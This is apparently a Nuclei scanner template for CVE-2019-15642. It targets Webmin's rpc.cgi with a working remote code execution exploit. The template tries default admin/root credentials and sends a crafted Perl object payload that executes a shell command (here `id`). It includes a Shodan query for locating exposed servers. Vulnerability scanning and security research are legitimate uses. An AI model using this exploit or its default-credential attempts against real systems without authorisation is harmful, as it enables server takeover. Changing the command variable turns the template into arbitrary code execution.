id: CVE-2019-15642

info:
  name: Webmin < 1.920 - Authenticated Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states "RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users."
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-15642
    - https://github.com/jas502n/CVE-2019-15642
  metadata:
    max-request: 4
    shodan-query: title:"Webmin"
    verified: true
  tags: cve,cve2019,webmin,rce

variables:
  cmd: '`id`'

http:
  - raw:
      - |
        POST /session_login.cgi HTTP/1.1
        Host: {{Hostname}}
        Cookie: redirect=1; testing=1
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}
        Accept-Encoding: gzip, deflate

        user={{username}}&pass={{password}}

      - |
        POST /rpc.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Referer: {{RootURL}}/sysinfo.cgi?xnavigation=1
        Accept-Encoding: gzip, deflate

        OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd={{cmd}};print "$cmd\n\n";

    attack: pitchfork
    payloads:
      username:
        - admin
        - root
      password:
        - admin
        - root

    stop-at-first-match: true
    host-redirects: true
    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body_2
        regex:
          - 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=(\d+)\(.*?\)'

      - type: word
        part: body_2
        words:
          - "Content-type: text/plain"

      - type: status
        status:
          - 200